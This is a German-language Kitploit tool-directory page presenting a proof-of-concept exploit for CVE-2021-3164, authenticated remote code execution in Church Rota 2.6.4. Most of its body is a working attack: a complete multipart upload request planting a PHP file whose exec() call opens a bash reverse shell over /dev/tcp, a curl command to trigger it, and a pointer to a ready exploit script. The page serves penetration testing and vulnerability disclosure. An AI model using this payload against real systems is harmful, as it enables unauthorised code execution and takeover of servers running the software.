Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2021-3164 — Church Rota Version 2.6.4 ist anfällig für authentifizierte Remote-Codeausführung. Der Benutzer benötigt keine Datei-Upload-Berechtigung, um eine beliebige Datei hochzuladen und auszuführen. Die Anwendung ist hauptsächlich in PHP geschrieben, daher verwenden wir PHP in unserem PoC. | Kitploit
Tools/GitHubGitHub/rmccarth/cve-2021-3164
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubrmccarth/cve-2021-3164

cve-2021-3164

Repository anzeigen
2vor 5 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

Church Rota Version 2.6.4 ist anfällig für authentifizierte Remote-Codeausführung. Der Benutzer benötigt keine Datei-Upload-Berechtigung, um eine beliebige Datei hochzuladen und auszuführen. Die Anwendung ist hauptsächlich in PHP geschrieben, daher verwenden wir PHP in unserem PoC.

Teilen

Church Rota Version 2.6.4 ist anfällig für authentifizierte Remote-Codeausführung. Der Benutzer benötigt keine Datei-Upload-Berechtigung, um eine beliebige Datei hochzuladen und auszuführen.

Nach dem Anmelden bei Church Rota senden Sie die folgende Anfrage und ersetzen Sie dabei die PHPSESSID durch Ihre eigene:

root@kitploit:~
POST /resources.php?action=newsent HTTP/1.1

Host: localhost:8081

User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: multipart/form-data; boundary=---------------------------78920178725041013532564196488

Content-Length: 571

Origin: http://localhost:8081

Connection: close

Referer: http://localhost:8081/resources.php?action=new

Cookie: PHPSESSID=ivaa0ck3snt9ajlm0od9d7lh4j

Upgrade-Insecure-Requests: 1

-----------------------------78920178725041013532564196488

Content-Disposition: form-data; name="resourcename"

exec

-----------------------------78920178725041013532564196488

Content-Disposition: form-data; name="resourcefile"; filename="exec.php"

Content-Type: text/plain

<?php

exec("/bin/bash -c 'bash -i > /dev/tcp/127.0.0.1/1234 0>&1'");

?>


-----------------------------78920178725041013532564196488

Content-Disposition: form-data; name="resourcedescription"



<p>text file upload</p>

-----------------------------78920178725041013532564196488--

Die Datei kann dann wie folgt ausgeführt werden:

root@kitploit:~
curl localhost:80/documents/exec.php

oder indem Sie in der Web-UI unter 'resources' auf die Datei klicken.

Oder installieren Sie einfach pwntools und requests mit pip und richten Sie dann das bereitgestellte Exploit-Skript cve-2021-3164.py ein und führen Sie es aus.

Tool herunterladen